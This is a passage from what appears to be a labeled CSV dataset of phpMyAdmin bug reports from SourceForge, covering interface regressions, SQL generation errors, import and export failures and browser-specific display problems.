libraries import ods.php line 38 ini set memory limit , 128M ); set time limit 120); Neither of these should be necessary as the memory limits are correctly set in import.php Original URL https sourceforge.net p phpmyadmin bugs 3469 Original author anonymous","bug"
"24444","9871","Cannot start session without errors.
After a failed connection, some browsers cannot reconnect until cookies are cleared.
See https bugs.mageia.org show bug.cgi?id=3184 c14 for details on recreating the bug.
Original URL https sourceforge.net p phpmyadmin bugs 3470 Original author davidwhodgins","bug"
"24444","9872","Deleted search results remain visible.
Deleted search results remain visible requiring a second click of the delete button to remove.
Here s a short video for better visual description http youtu.be AO PDGi37g Original URL https sourceforge.net p phpmyadmin bugs 3471 Original author fade2gray Found in version 3.4.7","bug"
"24444","9873","Firefox cannot language Arabic only).
This is a browser dependent bug.
I tested this with the latest stable multilingual version of PMA using Chrome 21.0.1180.89 and Firefox 15.0.
In both the multilingual version of phpMyAdmin will start in Arabic.
In Firefox when I change to another language it will breafly do so but then second it will change back to Arabic, making it utterly useless when you don t know that language.
In chrome it works fine.
A quick solution is to blame the browser, but still it would be nice when someone with more time can get to the bottom of this.
Original URL https sourceforge.net p phpmyadmin bugs 3675 Original author comunica2 Found in version 3.5.2","bug"
"24444","9874","Accessibility screen reader mislabels checkboxes.
On the page used to change a table column, the screen reader associates the label of the following field with the checkbox.
System WIN XP SP3, IE8, JAWS screen reader v10.0.1178 http www.freedomscientific.com) phpMyAdmin version 3.4.7 Git revisionRELEASE 3 4 7 27 g9b77e4d from STABLE branch.
URL from address bar) http demo.phpmyadmin.net STABLE index.php?db=membershiptest table=family target=tbl structure.php token=b1f2d991ed054895fa0f5bb50de2c0a5 PMAURL db=membershiptest table=family target=tbl structure.php token=b1f2d991ed054895fa0f5bb50de2c0a5 File containing the problem code http demo.phpmyadmin.net STABLE tbl alter.php Preconditions JAWS 10.0.1178 or similar) running after default installation virtual cursor mode, which is default on web pages).
Steps Log into phpMyAdmin Stable and create a database.
Create a table with at least 1 column.
Select the table.
Choose Structure.
Choose Change for one of the columns.
A 2 column table appears with labels on the left and controls on the right.
Press TAB until you reach the Attributes combo box; JAWS says Attributes combo box 1 of 5 .
Press TAB; JAWS says Auto increment checkbox not checked , expected JAWS says Null checkbox not checked .
Press TAB; JAWS says Comments checkbox not checked ; expected JAWS says Auto increment checkbox not checked .
The fix should be simple change lt;th gt; lt;abbr title= AUTO INCREMENT gt;AUTO INCREMENT lt; abbr gt; lt; th gt; to lt;th gt; lt;abbr title= AUTO INCREMENT gt; lt;label for= field 0 8 gt;AUTO INCREMENT lt; label gt; lt; abbr gt; lt; th gt; and similar for the Null row above it) The lt;label gt; element http www.w3.org TR 1999 REC html401 19991224 interact forms.html edef LABEL) tells a screen reader which element is the field s label.
Without this, the screen reader has to guess what is the label.
It seems that when JAWS finds a checkbox that is not the target of a lt;label gt; at the end of a two column table row it chooses the following text.
I saved a copy of the page finally!!)
and prototyped the change.
The page looks different, I assume because I only have the HTML from the frame without any style sheets, but it does make JAWS read properly.
You also need to fix the Null field in the same way.
I haven t rigorously tested the site or the page for that matter!
), but the two checkboxes are the only problems I notice.
BTW I think the lt;abbr gt; element serves no purpose here.
Original URL https sourceforge.net p phpmyadmin bugs 3472 Original author campg2003 Found in version 3.4.7","bug"
"24444","9875","Dropdown results setting NULL does not work.
If you have tables linked by InnoDB, then the dropdown box will launch, provided the maximum number of records is set in config.inc.php however, I think a dropdown for linked table records is easier.
But, there s one big problem you cannot set the records to NULL if the field is a null one, unless you edit in Browse mode.
Clicking on the tick box in Edit Mode when a record is already there and setting it to a null one does not allow you to so unless you edit in Browse mode.
This bug needs to be looked into; it s happened on the latest build I downloaded [beta version].
Original URL https sourceforge.net p phpmyadmin bugs 3473 Original author chalze6 Found in version 3.4.7","bug"
"24444","9876","Display issues with pmahomme theme in IE 8.
The gradient sometimes appears incorrectly when using IE 8, specifically in the Structure tab and the Search tab.
Possibly in other places too.
Also, the grey background of the boxes on Operations expands too far above the box header.
This may be due to the limitations of CSS support in IE 8, I don t know.
I attach screenshots for clarity.
Original URL https sourceforge.net p phpmyadmin bugs 3474 Original author anonymous Found in version 3.4.7","bug"
"24444","9877","Magic quotes removed in PHP 5.4.
In PHP 5.4, get magic quotes gpc ) produces a deprecation notice that shows up in the following config.inc.php situation cfg[ Error Handler ][ display ] = true; Original URL https sourceforge.net p phpmyadmin bugs 3476 Original author lem9 Found in version 3.4.7","bug"
"24444","9878","Fail to synchronize column with name of keyword.
we tried to synchronize a table with a column named as desc .
the synchronization failed to work, checking the MySQL log found that the column names are actually not back quoted in the SQL query.
Original URL https sourceforge.net p phpmyadmin bugs 3477 Original author anonymous Found in version 3.4.7","bug"
"24444","9879","Cannot display results from view users , 1046.
Environment information Server Localhost via UNIX socket Server Version 5.1.56 Protokoll Version 10 MySQL Zeichensatz UTF 8 Unicode utf8) Apache 2.2.19 Unix) mod ssl 2.2.19 OpenSSL 0.9.8e fips rhel5 mod bwlimited 1.4 PHP 5.2.17 MySQL Client Version 5.1.56 PHP Erweiterung mysql Versionsinformationen 3.2.5 I ve created the following view abstract) CREATE VIEW users AS SELECT FROM jobs Now when i click on the structure in phpMyAdmin, everythings is fine.
But if you click on the contents of the view, there occures the following error 1046 No database selected If i use another name for the view, for exaple users2 , there are no problems.
And if i manually enter the statement SELECT FROM database.users there are also no errors.
So finally the problem is It s not possible to display the contents of a view named users Original URL https sourceforge.net p phpmyadmin bugs 3478 Original author anonymous Found in version 3.2.5","bug"
"24444","9880","Synchronization of a database with large tables.
Hello, I ve been trying to use the synchronization feature of phpmyadmin v3.4.4 with no success.
I m trying to sync one of our production databases with our dev database to keep the dev data up to date.
I am able to connect to each database publicly, and if I put incorrect credentials into phpmyadmin on the synchronization page, it complains.
So I know that my credentials are right, and that phpmyadmin can connect to both databases both are also configured as browseable by phpmyadmin).
When I have the proper credentials, and click Go , phpmyadmin just spins in my browser for ever, and I truly mean forever.
I tried two separate times one I left for several hours, and the other I left overnight.
Both had no change.
I glanced briefly at the synchronization code, and it looks like it does some pretty manual database operations to compare the DBs as opposed to some sort of half replication).
I could be wrong here, my view was only brief.
This makes me wonder is the synchronization feature not feasible for databases with large tables?
For example, our sessions table has about 8 million rows.
Most of the other tables are significantly smaller.
One thing to note about our phpmyadmin setup we do not have pma storage enabled, so all configuration happens by hand.
The docs on synchronization are sparse, so I m not sure if this matters or not.
I originally asked about this on IRC, but was told that this forum might be more appropriate.
Please let me know if there is any more information that is required or that would be helpful.
Thanks!
Original URL https sourceforge.net p phpmyadmin bugs 3479 Original author kirbysayshi","bug"
"24444","9881","newer version of phpMyAdmin message not shown IE8.
The newer version of phpMyAdmin message is not shown when using Internet Explorer 8 on Windows XP.
Works as expected using Google Chrome.
Original URL https sourceforge.net p phpmyadmin bugs 3480 Original author candev Found in version 3.4.6","bug"
"24444","9882","Designer relations in IE 8.
I noticed that in IE 8 the relations the colored lines) are only drawn in designer if the compatibity mode is on and not otherwise.
Original URL https sourceforge.net p phpmyadmin bugs 3481 Original author roccivic Found in version 4.3.0","bug"
"24444","9883","Creating a user with grant all [...] on x option fails.
In the privileges user tab of a database fe db name), click add user In the JS popup that appears the option Grant all privileges on database db name is checked.
When creating the user fe test) with the Add User button, the following error is displayed 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near TO test localhost at line 1 Original URL https sourceforge.net p phpmyadmin bugs 3685 Original author ruleant Found in version Latest Git","bug"
"24444","9884","DB suggestion not correct for user with underscore.
When I create a user with an underscore say, test user ) and select Grant all privileges on wildcard name username\ ) the privilleges are created for test user\ When the user logs in and wants to create a database, the create database form shows test?user ...
I m using version 3.4.7.1 Original URL https sourceforge.net p phpmyadmin bugs 3482 Original author joolee Found in version 3.4.8","bug"
"24444","9885","Display chart and number of rows.
tbl chart.php fetches the whole data set generated by the query and puts it into an array.
Then, this is passed to the js level for chart generation.
Evidently, the web server s process and the browser itself hit memory limits, even for medium tables sakila.film actor).
I m not sure what the user expects when clicking on Display chart in terms of the number of rows, because, for example Query results operations gt;Print view only displays the current rows on screen 30 by default).
So I suggest to do something similar to what was done in Search gt;Zoom search to have in the chart interface a control for the maximum number of rows, with 500 as the default value.
Original URL https sourceforge.net p phpmyadmin bugs 3687 Original author lem9 Found in version 3.5.3","bug"
"24444","9886","Inline editing enums having null shows no dropdown.
Try to inline edit an enum field which has null as its initial value.
No dropdown is shown to select from.
Original URL https sourceforge.net p phpmyadmin bugs 3483 Original author madhuracj Found in version 3.4.0","bug"
"24444","9887","1231 Variable character set client can t be set to the.
I m trying to export database from local machine with phpmyadmin ver 3.5.1 and import on remote server working with phpmyadmin ver 3.3.9 the same, after updating to 3.5.1).
The import goes in two steps as there is time limitation for processing scripts on the server so it breaks in the middle and need to be resumed from this point).
In the end of the import I m getting the error SQL query !40101 SET CHARACTER SET CLIENT= OLD CHARACTER SET CLIENT ; MySQL said 1231 Variable character set client can t be set to the value of NULL Problem disappear after return to 3.3.9 version.
Could only suppose that there is a problem with export in newer version of phpmyadmin.
Original URL https sourceforge.net p phpmyadmin bugs 3689 Original author manicko Found in version 3.5.1","bug"
"24444","9888","navi not refreshed on add remove user database.
The database list in the left panel is not automatically updated after adding a user with the create database with the same name as the user selected.
Original URL https sourceforge.net p phpmyadmin bugs 3484 Original author ruleant Found in version Latest Git","bug"
"24444","9889","Table and data is not visible when created via MySQL WB.
The table was created, and data inserted via MySQL Workbench v.5.2.35.
I see everything perfectly doing SELECT FROM db.table.
The same is true when working directly from mysql console on the server v.5.1.52).
However, I can not see the table in the table list, and can not do a select from this table using phpMyAdmin latest at the moment of posting this, 3.4.7.1).
1146 Table db.table doesn t exist.
This is true for any user, including root.
Original URL https sourceforge.net p phpmyadmin bugs 3485 Original author anonymous Found in version 3.4.7","bug"
"24444","9890","Firefox favicon frameset regression.
I updated from 3.2.0.1 to 3.4.x whatever is the latest a couple days ago, I think 2.4.0).
The software is now pulling the localhost favicon instead of the favicon defined by the link element.
Showing individual frames works fine however phpMyAdmin works better with frames for me.
I used WinMerge to see if there was any difference between 3.2 and 3.4 and there wasn t. I m not sure how this regressed.
There is a known Firefox bug that I don t think was ever resolved https bugzilla.mozilla.org show bug.cgi?id=261912).
unfortunately I have never encountered this before and I don t see any straight forward answer to resolving this regression.
I also tried retaining the original icon just to be sure.
I m not sure else what I could try other then continuing to use version 3.2.
This bug is important to me as I quickly identify tabs based off of their favicon.
I highly prefer phpMyAdmin s favicon over my own so I can quickly locate the tab where the software is open as I use it frequently.
I now have to use the older 3.2.x version in order to maintain my normal work environment.
Original URL https sourceforge.net p phpmyadmin bugs 3486 Original author jabcreations Found in version 3.4.8","bug"
"24444","9891","Fast filter broken with table tree.
There is small error in file navigation.js, for fast filter input field.
If tables are groupped, and I try to filter them, left panel will be empty see attached image).
To fix this error file navigation.js must be edited so code was a elem.html ).toLowerCase ).indexOf lowercase value)== 1?
elem.parent ).hide ) elem.parent ).show ) code edited a elem.html ).toLowerCase ).indexOf lowercase value)== 1?
elem.parent ).hide ) elem.parents li ).show ) Original URL https sourceforge.net p phpmyadmin bugs 3487 Original author dimka20 Found in version 3.4.0","bug"
"24444","9892","Unable to move tables with triggers.
It is not possible to move tables with triggers and to rename databases with tables having triggers.
MySQL error 1435 Trigger in wrong schema occurs Original URL https sourceforge.net p phpmyadmin bugs 3488 Original author madhuracj Found in version 3.4.0","bug"
"24444","9893","Fatal error Cannot redeclare PMA extract db or table ).
I get the following fatal error Fatal error Cannot redeclare PMA extract db or table ) previously declared in phpmyadmin\libraries\replication.inc.php 143) in phpmyadmin\libraries\replication.inc.php on line 151 I get the error with the following steps AJAX is turned off) 1 Go to home page of my PMA install 2 Click on Databases in top nav 3 Enter a table name in the form above the Database listing and hit Create 4 Database is created successfully, but error is shown below the SQL statement.
Because the database is created properly, and everything seems normal aside from the error), it s not a high priority.
Original URL https sourceforge.net p phpmyadmin bugs 3489 Original author benjamwelker Found in version Latest Git","bug"
"24444","9894","TextareaAutoSelect feature broken.
As discovered by Madhura, setting this to true does not exhibit intended behavior.
Original URL https sourceforge.net p phpmyadmin bugs 3490 Original author lem9 Found in version 3.4.9","bug"
"24444","9895","license issue with tcpdf.
please also review https bugzilla.novell.com show bug.cgi?id=736698 phpMyAdmin 3.4.7.1 and presumably many earlier versions as well) contains tcpdf.
This package claims to be LGPL 3.0 licensed but contains the following clause Additionally, YOU CAN T REMOVE ANY TCPDF COPYRIGHT NOTICE OR LINK FROM THE GENERATED PDF DOCUMENTS.
As the LGPL 3.0 incorporates by reference the GPL 3.0 , sections 7 and 10 of the GPL 3.0 are relevant All other non permissive additional terms are considered further restrictions within the meaning of section 10.
If the Program as you received it, or any part of it, contains a notice stating that it is governed by this License along with a term that is a further restriction, you may remove that term.
If a license document contains a further restriction but permits relicensing or conveying under this License, you may add to a covered work material governed by the terms of that license document, provided that the further restriction does not survive such relicensing or conveying.
Accordingly, it may be possible to point out to tcpdf upstream that the additional term that they apply may be viewed as a non permissive restriction and that you wish to exercise your rights under the GPL 3.0 to remove that term from downstream distributions.
If upstream are unwilling to engage in meaningful discussion or take the view that the additional restriction is per se not part of the license because it is above the license and not incorporated into it, tcpdf should be dropped.
Original URL https sourceforge.net p phpmyadmin bugs 3492 Original author jimmik Found in version 3.4.7","bug"
"24444","9896","Sort by key generates wrong sql with limit clause.
Steps to reproduce 1\.
Use an explicit limit clause on any table 2\.
Chose a sorting order based on a key from Sort by key dropdown The generated sql query has the limit clause prior to the order by clause.
Original URL https sourceforge.net p phpmyadmin bugs 3493 Original author madhuracj Found in version 3.4.0","bug"
"24444","9897","javascript tables fast filter only limited by MaxTableList.
if I have a database with a lot of tables, listing all tables take considerable time.
I d like to have MaxTableList at about 30 but then the fast filter only filter in those 30 tables when there is multiple table, couldn t it load tables name in an asynchronous ajax request?
Original URL https sourceforge.net p phpmyadmin bugs 3494 Original author anonymous Found in version 3.4.8","bug"
"24444","9898","cannot press enter on the VARIABLE field.
if I press enter after typing a value in the VARIABLE field of a bookmarked query, it s the query displayed above which is executed, not the bookmarked one Original URL https sourceforge.net p phpmyadmin bugs 3496 Original author anonymous Found in version 3.4.8","bug"
"24444","9899","Error when session time expires.
To see the bug follow the isntructions a.
Open phpmyadmin b. Click a table to see his contents rows) not the structure of the table) c. Let phpmyadmin tab open for a long time 1440 seconds is enough )) d. Then go to phpmyadmin tab and click modify option of a row of the table that you allready watch it s content e. Then you wil redirect to autherication page.Type your password and then click aply f. Bug you go to a page that s is for insert a new row into the table...
I am ussing 3.4.5 version of phpmyadmin Original URL https sourceforge.net p phpmyadmin bugs 3498 Original author anonymous Found in version 3.4.9","bug"
"24444","9900","Setting data to NULL and drop downs.
I m on Windows, and these are my webserver details Apache 2.2.21 Win32) mod ssl 2.2.21 PHP 5.35 I have downloaded the latest Git snapshot and it works well mostly on my server, but when it comes to setting results as NULL, it does not allow you to.
Whether the link contains a hyperlink or not, try setting it to NULL, it will not allow you to and this applies only to tables with referential integrity, not normal tables where there s no link to another one, that works fine.
This applies from 3.48 onwards, I ve continually upgraded and tried to reproduce this.
Attached is the database; import it into your 3.49 or snapshot version and see if you can make any records null, it does not seem to let me.
Original URL https sourceforge.net p phpmyadmin bugs 3499 Original author chalze6 Found in version 3.4.9","bug"
"24444","9901","Require error after update.
Sometimes, in release 3.4.8 and 3.4.9 after updating the value of a table s field there is a response in error.
The error displayed is 0 PMA sendHeaderLocation http www.videohipico.com Pma.349 sql.php?db=alfredo8 Races table=RaceProgramDetail token=6eaea3c9b145c5ecc9fdf9ffb5f3e1a0 sql query=SELECT 2A FROM 60RaceProgramDetail 60 WHERE 60Notes 60 LIKE 27Rod C3 B3 27 message=MySQL ha devuelto un conjunto de valores vac C3 ADo 28es decir 3A cero columnas 29.
28 La consulta tard C3 B3 0.1297 seg 29) called at [ var www vhosts videohipico.com httpdocs Pma.349 sql.php 793] 1 require var www vhosts videohipico.com httpdocs Pma.349 sql.php) called at [ var www vhosts videohipico.com httpdocs Pma.349 tbl replace.php 456] Maybe it has something to do with the value updates is using something like amp;aacute; or amp;eacute; or amp;iacute; or amp;oacute; or amp;uacute; or amp;ntilde; etc.
with capitals and non capitals letters, because whenever this has happenend to me I was doind something like that.
Original URL https sourceforge.net p phpmyadmin bugs 3500 Original author yacar suscri Found in version 3.3.7","bug"
"24444","9902","Displaying procedure output.
phpMyAdmin displays that query returns empty result for evry stored procedure, even if in execute some select statment, even if it is SELECT 1; Original URL https sourceforge.net p phpmyadmin bugs 3501 Original author samogot Found in version 3.5.0","bug"
"24444","9903","Syntax Error line 1, Possible Bug.
No Recent database backups wil Import to server.
Syntax error will not allow database import and possible bug error msg comes up.
Error There seems to be an error in your SQL query.
The MySQL server error output below, if there is any, may also help you in diagnosing the problem ERROR Unknown Punctuation String 8 STR SQL http astropathways.com http astropathways com .mht news or mail text From lt; Saved by Windows Internet Explorer 8 gt; Subject http astropathways.com Date Thu, 5 Jan 2012 04 57 55 0500 M I M E Version 1.0 Content Type multipart related; SQL query http astropathways.com http astropathways com .mht news or mail text From lt; Saved by Windows Internet Explorer 8 gt; Subject http astropathways.com Date Thu, 5 Jan 2012 04 57 55 0500 M I M E Version 1.0 Content Type multipart related; MySQL said 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \\\ http astropathways.com http astropathways com .mht news or mail text From \\\ at line 1 Original URL https sourceforge.net p phpmyadmin bugs 3502 Original author chris1971 Found in version 2.3.1","bug"
"24444","9904","Backup Files Will Not Import.
Msg1 Error There is a chance that you may have found a bug in the SQL parser.
Please examine your query closely, and check that the quotes are correct and not mis matched.
Other possible failure causes may be that you are uploading a file with binary outside of a quoted text area.
You can also try your query on the MySQL command line interface.
The MySQL server error output below, if there is any, may also help you in diagnosing the problem.
If you still have problems or if the parser fails where the command line interface succeeds, please reduce your SQL query input to the single query that causes problems, and submit a bug report with the data chunk in the CUT section below BEGIN CUT eNrljDsOwjAUBFO U wBrCfsJHxMZUVWQHJsYwc4QYo07iJBwd1JuAbSVKvZsSmFpNFJdArOeg0J BdXUlMd1r4iGd745jZYlt3u654SQBUxv SjwsKv0nAuuFkfeURyMRs0NH1hSvMRNECFvd8UnuLks L3LG9xpToV 4U53 jS9MIliq END CUT BEGIN RAW ERROR C1 C2 LEN 1 2 243 STR MySQL 5.1.56 USR OS, AGENT, VER Win IE 8.0 PMA 3.4.7.1 PHP VER,OS 5.2.9 Linux LANG en SQL \};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\}; END RAW SQL query \}; MySQL said 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \} at line 1 Msg 2 Error There is a chance that you may have found a bug in the SQL parser.
Please examine your query closely, and check that the quotes are correct and not mis matched.
Other possible failure causes may be that you are uploading a file with binary outside of a quoted text area.
You can also try your query on the MySQL command line interface.
The MySQL server error output below, if there is any, may also help you in diagnosing the problem.
If you still have problems or if the parser fails where the command line interface succeeds, please reduce your SQL query input to the single query that causes problems, and submit a bug report with the data chunk in the CUT section below BEGIN CUT eNrljDsOwjAUBFO U wBrCfsJHxMZUVWQHJsYwc4QYo07iJBwd1JuAbSVKvZsSmFpNFJdArOeg0J BdXUlMd1r4iGd745jZYlt3u654SQBUxv SjwsKv0nAuuFkfeURyMRs0NH1hSvMRNECFvd8UnuLks L3LG9xpToV 4U53 jS9MIliq END CUT BEGIN RAW ERROR C1 C2 LEN 1 2 243 STR MySQL 5.1.56 USR OS, AGENT, VER Win IE 8.0 PMA 3.4.7.1 PHP VER,OS 5.2.9 Linux LANG en SQL \};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\};\}; END RAW SQL query \}; MySQL said 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \} at line 1 Original URL https sourceforge.net p phpmyadmin bugs 3503 Original author chris1971 Found in version 2.3.2","bug"
"24444","9905","Cannot return multiple result sets from procedure.
after fixing bug Displaying procedure output ID 3472023 i tried to exequte procedure with several select statment inside, but it cause crashing suspending) my web server.
for exapmle create database test db; use test db; delimiter create procedure test proc ) begin select 1; select 2; end delimiter ; call test proc ); then i tried to do something similar without procedure, and discover that phpmyadmin displaying only first result set, for example select 1; select 2; displays only 1 but not 2.
PhpMyAdmin also handles errors only for first statement, for example select 1; select `none exist field`; displays Your SQL query has been executed successfully insted of 1054 Unknown column none exist field in field list I decided to try to fix it myself and write such code in sql.php result = PMA DBI try query full sql query, null, PMA DBI QUERY STORE); resunts = array result); errors = array PMA DBI getError )); while true) \{ if !
PMA DBI more results )) \{ break; \} resunts[] = PMA DBI next result ); errors[] = PMA DBI getError ); \} var dump errors); var dump resunts); but errors and resunts are always has only one element.
I think this may be due to the fact that PMA DBI try query ) uses mysqli query ) instead mysqli multi query ) here is code that i use in my project to handle multiply result sets if this gt;mysqli gt;multi query sql)) \{ Executing query if this gt;mysqli gt;more results )) \{ Check existence of at least one result set result = array ); do \{ result[] = this gt;mysqli gt;store result ); Storing result into array \} while this gt;mysqli gt;next result )); if this gt;mysqli gt;error) error = this gt;mysqli gt;error; Handling errors in other statments \} else result = true; \} else \{ error = this gt;mysqli gt;error; Handling error in first statment result = false; \} Original URL https sourceforge.net p phpmyadmin bugs 3505 Original author samogot Found in version 3.5.0","bug"
"24444","9906","Missing set fields and erroneous INSERT query.
phpMyAdmin 3.4.5 and 3.4.9 on MySQL 5.5.16 in a fresh xampp win32 1.7.7 installation Using the Insert tab, if no option in a set is selected, generated INSERT queries with empty set ) field values lack of field names and value placeholders.
The result is an error that the number of fields does not match the table definition.
Example CREATE TABLE IF NOT EXISTS `ingredient uses` `id` int 10) unsigned NOT NULL AUTO INCREMENT, `ingredient` varchar 40) NOT NULL, `byproduct` varchar 40) NOT NULL, `general` set Health , Mana , Mental recovery , Physical recovery ) NOT NULL, `stats` set Agility , Charisma , Endurance , Intelligence , Strength , Will ) NOT NULL, `power` enum low , average , high , important ) NOT NULL DEFAULT average , PRIMARY KEY `id`), KEY `general` `general`), KEY `stats` `stats`), KEY `power` `power`) ) ENGINE=MyISAM DEFAULT CHARSET=utf8 ; If I try to insert two datasets using the Insert tab, the following SQL query is generated INSERT INTO `ps alchemy`.`ingredient uses` `id` , `ingredient` , `byproduct` , `general` , `stats` is missing `power` ) VALUES NULL , Feverfew , , Health , average a placeholder for the empty set for `stats` is missing ), NULL , Yarrow , Aphrodisiac , Physical recovery , Endurance , low ) Such a result was not usual with older MySQL versions.
I got reports that it happens for some older phpMyAdmin versions 3.3.x) too.
Therefore I wonder if the reason is PHP 5.5.x reporting the structure of tables differently, so phpMyAdmin may fail interpreting it.
Original URL https sourceforge.net p phpmyadmin bugs 3506 Original author ligh1l Found in version 3.4.9","bug"
"24444","9907","3.5.0 alpha1 WSOD when clicking database.
With 3.5.0 alpha1, we get a WSOD after clicking one of our databases in the left frame.
We did not have this problem with phpMyAdmin master 20111109 022001, so I reverted back to it.
Server info CentOS 5.7 x64 2.6.18 274.7.1.el5 Apache 2.2.17 PHP 5.3.5 MySQL client 5.0.77 CentOS 5.7 default) MySQL server 5.1.58 This is with cfg[ Servers ][ i][ extension ] = mysqli ; in config.inc.php.
Tried mysql and mysqlnd as well.
With mysqlnd we can t even login in the db server.
With mysql the problem is the same, page keeps loading until WSOD occurs.
Original URL https sourceforge.net p phpmyadmin bugs 3507 Original author stintel Found in version 3.5.0","bug"
"24444","9908","Column 0 not changeable.
In 3.5.0 beta2, the structure of a column named 0 cannot be changed Ajax or not).
Original URL https sourceforge.net p phpmyadmin bugs 3510 Original author lem9 Found in version 3.5.0","bug"
"24444","9909","Create statement detection problem.
I ran into a weird error when importing a PHPMyAdmin 3.4.9) SQL export into another database using PHPMyAdmin 3.4.9) I ve isolated the problem and made a small testcase.
Executing the folowing code by import or manual sql entry) gt; CREATE TABLE `test` gt; `col1` varchar 255) NOT NULL gt; ); gt; gt; INSERT INTO `test` `col1`) VALUES create something1 ), view something2 ), set as something3 ); The spaces before and the words after the special keywords are necessary to reproduce the problem) Produces the folowing error by PHPMyAdmin gt; Error gt; gt; SQL query Edit gt; gt; SHOW FULL COLUMNS FROM `joolee test`.`something2 ),` gt; gt; MySQL said Documentation gt; 1146 Table joolee test.something2 ), doesn t exist I ve searched for and changed all documents containing SHOW FULL COLUMNS FROM and found out that the problem query originates from the libraries tracker.class.php file line 277) Original URL https sourceforge.net p phpmyadmin bugs 3511 Original author joolee Found in version 2.11.9","bug"
"24444","9910","new layout is unusable on small screens.
Try to use phpMyAdmin on a screen with 1024x768 resolution or below.
Create a new table in a database.
You ll find yourself trapped in an insane numver of nested vertical and horizontal scrollbars, and some parts of the overlay window with the column names and parameters are completely unaccessible even by scrolling mainly because the overlay stays behind the left panel).
This is a regression somewhere between 2.9 and 3.4.5.
Version 2.9 was perfectly usable.
Maybe it didn t look so cool but you could use it.
I am a teacher and use phpMyAdmin in a classroom with the computer connected to a projector which has a resolution of 1024x768.
With the new version it is completely impossible to do a class.
Original URL https sourceforge.net p phpmyadmin bugs 3513 Original author sistisette Found in version 3.4.5","bug"
"24444","9911","php changing format when creating view.
using mysql 5.1.5 ,myphpadmin 2.11.9.6, php 5.3.6 When creating a view in phpmyadmin on yahoo business the select statement changes when attempting to use text.
Below are two examples of an If statement and a case statement that return an Integer.
Both of these views work correctly.
There are also three examples of an If statement to return text and three examples of case statements to return text.
None of these six examples work correctly even when using using single quotes, double qoutes or no quotes at all.
Please review all of the below examples and let me know what is happening that the select statement changes.
SELECT If Month Now ))=2,555,999) works correctly SELECT case Month now )) when 2 then 555 else 999 end works correctly SELECT If Month Now ))=2, Feb , Oth ) changes the select statement to SELECT If Month Now ))=2,\ Feb\ ,\ Oth\ ) and gives error 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \ Feb\ ,\ Oth\ ) at line 5 SELECT If Month Now ))=2, Feb , Oth ) changes the select statement to SELECT If Month Now ))=2,\ Feb\ ,\ Oth\ ) and gives error 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \ Feb\ ,\ Oth\ ) at line 5 SELECT If Month Now ))=2,Feb,Oth) gives below error 1054 Unknown column Feb in field list SELECT case Month now )) when 2 then Feb else Other end changes the select statement to SELECT case Month now )) when 2 then \ Feb\ else \ Other\ end and gives error 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \ Feb\ else \ Other\ end at line 5 SELECT case Month now )) when 2 then Feb else Other end changes the select statement to SELECT case Month now )) when 2 then \ Feb\ else \ Other\ end and gives below error 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \ Feb\ else \ Other\ end at line 5 SELECT case Month now )) when 2 then Feb else Other end gives below error 1054 Unknown column Feb in field list Original URL https sourceforge.net p phpmyadmin bugs 3515 Original author rbeach1955","bug"
"24444","9912","php changing format when creating view.
using mysql 5.1.5 ,myphpadmin 2.11.9.6, php 5.3.6 When creating a view in phpmyadmin on yahoo business the select statement changes when attempting to use text.
Below are two examples of an If statement and a case statement that return an Integer.
Both of these views work correctly.
There are also three examples of an If statement to return text and three examples of case statements to return text.
None of these six examples work correctly even when using using single quotes, double qoutes or no quotes at all.
Please review all of the below examples and let me know what is happening that the select statement changes.
SELECT If Month Now ))=2,555,999) works correctly SELECT case Month now )) when 2 then 555 else 999 end works correctly SELECT If Month Now ))=2, Feb , Oth ) changes the select statement to SELECT If Month Now ))=2,\ Feb\ ,\ Oth\ ) and gives error 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \ Feb\ ,\ Oth\ ) at line 5 SELECT If Month Now ))=2, Feb , Oth ) changes the select statement to SELECT If Month Now ))=2,\ Feb\ ,\ Oth\ ) and gives error 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \ Feb\ ,\ Oth\ ) at line 5 SELECT If Month Now ))=2,Feb,Oth) gives below error 1054 Unknown column Feb in field list SELECT case Month now )) when 2 then Feb else Other end changes the select statement to SELECT case Month now )) when 2 then \ Feb\ else \ Other\ end and gives error 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \ Feb\ else \ Other\ end at line 5 SELECT case Month now )) when 2 then Feb else Other end changes the select statement to SELECT case Month now )) when 2 then \ Feb\ else \ Other\ end and gives below error 1064 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near \ Feb\ else \ Other\ end at line 5 SELECT case Month now )) when 2 then Feb else Other end gives below error 1054 Unknown column Feb in field list Original URL https sourceforge.net p phpmyadmin bugs 3516 Original author rbeach1955","bug"
"24444","9913","Exception on XML import.
It looks like error handling in XML import is not as it should be FastCGI stderr PHP Fatal error Uncaught exception Exception with message Serialization of SimpleXMLElement is not allowed in libraries Error.class.php 161 Stack trace libraries Error.class.php 161) serialize Array) libraries Error Handler.class.php 106) PMA Error gt;getHash ) [internal function] PMA Error Handler gt;handleError 2, count ) Node n... , ... , 189, Array) libraries import xml.php 189) count Object SimpleXMLElement)) import.php 394) include ... ) \{main\} thrown in libraries Error.class.php on line 161 Seen on demo server on current master, I have no clue what were imported data.
Original URL https sourceforge.net p phpmyadmin bugs 3518 Original author nijel Found in version Latest Git","bug"
"24444","9914","Infinite recursion on PDF export.
